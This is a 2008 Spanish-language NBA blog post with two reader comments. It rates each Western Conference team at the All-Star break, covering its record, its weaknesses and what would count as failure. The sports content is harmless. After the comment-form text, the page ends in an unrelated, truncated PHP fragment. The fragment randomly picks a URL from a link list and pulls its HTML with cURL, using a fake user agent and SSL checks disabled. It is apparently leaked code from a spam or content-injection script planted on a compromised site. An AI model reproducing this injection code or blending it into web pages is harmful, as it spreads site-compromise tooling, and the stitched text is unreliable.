Informe Conferencia Oeste

21 de February de 2008 por MagicJohnson32

Superado el All-Star, a punto de alcanzar el plazo límite para cerrar los traspasos, la temporada NBA nos permite ya hacer una valoración de lo realizado y una previsión de lo que cada equipo necesita y está en condiciones de conseguir. Así que a eso vamos. Os ofrecemos un informe de cada equipo en dos tandas, una por conferencia y ordenados de mejor a peor según su balance actual.

Empezamos por la CONFERENCIA OESTE

1 New Orleans Hornets (36-15)

neworleansteamlogoHasta la fecha Byron Scott es de largo el entrenador del año, Chris Paul apunta a MVP y los Hornets encabezan la mejor Conferencia Oeste en mucho tiempo. No hay palabras.

Les falta rotación de un modo dramático. Y experiencia.

Sería un fracaso caer en Playoffs sin plantar cara para poner la guinda a lo que apunta a una magnífica campaña.

2 Phoenix Suns (37-16)

phoenixteamlogoHasta la fecha en su sitio, luchando por el liderato del Oeste.

Les falta defensa, y en ésas va Kerr y traspasa al que era, con mucha diferencia, su mejor defensor. Velitas a la Virgen del Desierto de Arizona para que O’Neal se ponga en forma.

Sería un fracaso que Shaq confirme su declive y que la franquicia choque este verano con la realidad de su contrato de 40 millones en dos años.

3 Los Angeles Lakers (36-17)

lalakersteamlogoHasta la fecha están muy por encima de las previsiones, que necesitaron de una revisión a la baja con la lesión de Bynum y que se han disparado con la llegada de Gasol.

Les falta salud. Primero fue Bynum, luego Ariza y, por último, el dedo de Byant. De la recuperación del primero y de que aguante el último dependerá el éxito de los Lakers.

Sería un fracaso no disputar las Finales del Oeste; que llegue abril y Bryant se arrepienta de no haber pasado por quirófano en febrero.

4 San Antonio Spurs (35-17)

sanantonioteamlogoHasta la fecha, a su ritmo. En una temporada discreta, con la lesión de Tony Parker, siguen aspirando a liderar la conferencia.

Les falta que éste no sea año impar.

Sería un fracaso que en junio nos acabemos creyendo lo de los años pares y los años impares.

5 Dallas Mavericks (35-18)

dallasteamlogoHasta la fecha no han dado las mejores sensaciones pero siguen arriba. Añadir a Jason Kidd jamás puede ser malo pero está por ver cómo encajará con Nowitzki.

Les falta juego interior de una forma alarmante.

Sería un fracaso que los Mavs vuelvan a desaprovechar el lujo de contar con uno de los mejores bases de la historia (y también va por Nash)

6 Utah Jazz (35-19)

utahteamlogoHasta la fecha sólo han flaqueado en diciembre. Las sensaciones son muy buenas y el añadido de Korver ha sido positivo.

Les falta que Okur y Kirilenko sean capaces de rendir cada noche. Y que todo el equipo sea capaz de rendir mejor como visitantes.

Sería un fracaso no acabar líderes de la NorthWest y pasar una ronda de Playoffs.

7 Houston Rockets (33-20)

houstonteamlogoHasta la fecha van de menos a más. Las dudas que genera McGrady las va solventando Yao con la ayuda de un sorprendente Alston. Serán un rival terrible en primera ronda.

Les falta que McGrady sea capaz de jugar a buen nivel con lesiones o sin ellas y que Adelman no se empeñe en imitar a Van Gundy.

Sería un fracaso caer en primera ronda (aunque más que un fracaso, sería una costumbre).

8 Denver Nuggets (33-20)

denverteamlogoHasta la fecha se mantienen en posiciones de Playoffs, tan cerca de liderar la división NorthWest como de la novena plaza.

Les falta algo. Se habla de Artest cuando necesitan cualquier cosa menos un alero. Se habla también de Randolph, con lo que la opción Artest tampoco parece tan mala idea.

Sería un fracaso no ganar algún partido de Playoffs.

9 Golden State Warriors (32-21)

goldenstateteamlogoHasta la fecha cumplen con la idiosincrasia de su entrenador. Pierden partidos ganados, ganan partidos perdidos, anotan más que nadie y encajan mucho más que cualquier otro equipo. Así son ellos.

Les falta un base suplente que quite presión sobre Baron Davis. La frivolidad de firmar a Webber tuvo su gracia pero la broma no da para más; hace falta un pívot de cara a Playoffs.

Sería un fracaso quedarse fuera de los Playoffs.

10 Portland Trail Blazers (28-25)

portlandteamlogoHasta la fecha han sido una sorpresa muy agradable pero parece que se acabó. Al menos han dado la sensación de que al fin han roto una dinámica negativa y el año próximo, con Oden, serán algo serio.

Les falta un tal Greg.

Sería un fracaso que el tal Greg no sea para tanto y no convierta a los Blazers en equipo de Playoffs.

11 Sacramento Kings (24-28)

sacramentoteamlogoHasta la fecha se han visto castigados por las lesiones y la exigencia del Oeste, que no permite estas cosas. Ya es demasiado tarde para pensar en los Playoffs, así que toca pensar en la próxima temporada: Bibby, fuera. Artest será el próximo.

Les falta deshacerse de Artest y, a ser posible, de Kenny Thomas y Rahim (sí, están vivos y siguen cobrando mucho dinero, y lo seguirán haciendo hasta la 2010-2011).

Sería un fracaso que no sean capaces de liberar el dinero suficiente como para pescar algo importante este verano.

12 Los Angeles Clippers (17-33)

laclippersteamlogoHasta la fecha no se les puede pedir más. Devastados por las lesiones, han demostrado orgullo y sacan la cabeza de las últimas posiciones gracias a un gran Kaman.

Les falta un tal Elton.

Sería un fracaso que ésta sea la última temporada de Brand en los Clippers. El jugador posee una player option para ampliar su contrato un año por 16,4 millones.

13 Seattle SuperSonics (14-38)

seattleteamlogoHasta la fecha el equipo ha batido el récord de derrotas consecutivas con 14. “Welcome to the NBA, Kevin Durant”.

Les falta Ray Allen y Rashard Lewis.

Sería un fracaso permitir que los Grizzlies y los Wolves elijan antes en el draft.

14 Memphis Grizzlies (14-39)

memphisteamlogoHasta la fecha han juntado a un tridente interior fabuloso: Milicic-Kwame Brown-Jason Collins.

Les falta una comisión que prohíba traspasos como el de Gasol (tomando prestada la idea de Popovich).

Sería un fracaso que en un equipo con Kwame, Collins y Cardinal, el único jugador que salga sea Mike Miller. O este verano arrasan el mercado o alguien debería encarcelar a Chris Wallace en una prisión tailandesa.

15 Minnesota Timberwolves (11-41)

minnesotateamlogoHasta la fecha siguen descubriendo lo dura que es la vida sin Kevin Garnett.

Les falta años de travesía por el desierto hasta que los jóvenes empiecen a dar frutos.

Sería un fracaso que no haga movimientos un equipo en el que los jugadores mejor pagados son, en este orden, Theo Ratliff, Antoine Walker, Juwan Howard, Marko Jaric, Troy Hudson, Greg Buckner, Michael Doleac y Eddie Griffin.

Comenta

2 comentarios a esta entrada

  1. RusticoColorao dice:
    #1

    La verdad que la conferencia Oeste está preciosa…buen artículo Magic. Yo creo que la lucha está entre Spurs y LA…pero puede que salte una sorpresa, lease Utah el año pasado.

      Citar

  2. Jabho dice:
    #2

    Si el rival a batir son los Spurs y el que mejor se ha reforzado ha sido Los Angeles con el tokomocho de Gasol… Suns y Mavs un pasito detrás y en tercera linea el resto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>